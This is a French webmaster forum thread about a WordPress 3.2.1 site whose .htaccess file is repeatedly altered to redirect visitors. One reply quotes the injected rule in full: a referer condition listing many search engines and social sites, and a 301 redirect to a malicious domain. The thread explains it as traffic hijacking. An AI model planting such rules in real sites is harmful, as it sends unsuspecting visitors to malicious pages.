hacking wordpress 3.2.1 avec changement de .htacess

[zen la tortue]

bonjour,
depuis 2 jours mon .htaccess est modifié par rediriger mon site vers une site malveillant .

j'ai scanné mon site avec plusieurs antivirus en ligne tout est clean
je ne comprends pas .
Avez vous une idée ?
merci

 

[JanoLapin]

vois peut-être du côté de ton hébergeur... cela ne vient peut-être pas de ton site

 

[zen la tortue]

vois peut-être du côté de ton hébergeur... cela ne vient peut-être pas de ton site

je suis chez ovh avec un server mutualisé 720 plan

 

[padadam22]

Peu importe l'hébergeur ou le service que tu as, tu devrais les contacter pour qu'ils vérifient de leur côté
La faille vient peut être d'un plugin ou du template que tu utilises.

 

[zeb]

j'ai scanné mon site avec plusieurs antivirus en ligne tout est clean

Je serais curieux de savoir comment un antivirus en ligne te permet de savoir si un fichier serveur est infecté.
Si tu parle de scanner tes fichiers de site en local avec un antivirus en ligne, souvent dédié a la désinfection des PC perso, alors n'espère pas trouver un code qui est destiné a s'attaquer a un serveur web.

 

[le-bon-plan.com]

Il y a une forte probabilité que la faille provienne d'une extension Wordpress.

Fais des recherches sur le net pour vérifier si certaines extensions que tu utilises n'ont pas de pb de sécurité.

Exemple de recherche "nom extension + fail xss" ...

 

[zeb]

Et pour info sans citer personne tu n'est pas le seul sur le forum a être victime de cette bouse. La cascade de redirections qui s’enchainait par modification de htaccess tombe maintenant sur des serveurs blacklistés.

 

[padadam22]

Zeb, de quelle bouse parles-tu ?

 

[zeb]

Zeb, de quelle bouse parles-tu ?

J'ai eu l'occasion d'entendre parler et de voir le résultat d'un virus du genre de celui dont il est question ici c'est lui que je nome "bouse" (allusion non déguisée a une partie de la production bovine)

en gros voici le résultat sur un fichier htaccess :

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ -http://4ppics3tting.in/rib4/index.php [R=301,L]

dans certains cas le fichier htaccess initial est reproduit en dessous.
Comme tu peux le voir le code en question (ou celui qui le gère) produit une redirection en fonction d'où tu viens vers un domaine (j'ai un peu maquillé le NDD) qui est maintenant blacklisté.
Le dit domaine opérait une redirection chez un copain à lui qui lui injectait une page pure javascript qui en fonction d'un chiffre (ou un truc dans le genre) te renvoyait ailleurs sur un autre site.
C'est un pur détournement de trafic en fait.

La cible qui a vécu (vie encore plus ou moins ça) est maintenant listé "site dangereux" dans GG sur sa requête principale. Et si par le plus grand des hasard tu tente d'y accéder via l'url si tu la connais, Firefox te donne une page d'alerte propre a faire peur au premier lambda venu.

Bref le pauvre gars a tout perdu en trois jours et il lui reste a identifier l'entrée (si c'est pas déjà fait) et a nettoyer le site après avoir colmaté la faille (ça doit être fait puisqu'il tournait bien cet aprem).

Ensuite il devra contacter google et tous les sites de blacklistage pour dire "coucou je me suis fait hacker" mais maintenant c'est OK. Je ne te parle pas non plus de l'impact WOT possible (j'ai pas vérifié) où monsieur "Poissonard" (allusion "au bon beurre") va se lacher pour lapider le pauvre site plein de vilains virus (les plus beauf ont la gâchette facile la dessus).

 

[padadam22]

Hum... un beau bazar en somme.

 

[zeb]

ouep, autrement dit un gros mer*ier.

Architecture classique pour ce souci (je supose) : windows / compte admin / fillezila pas en SFTP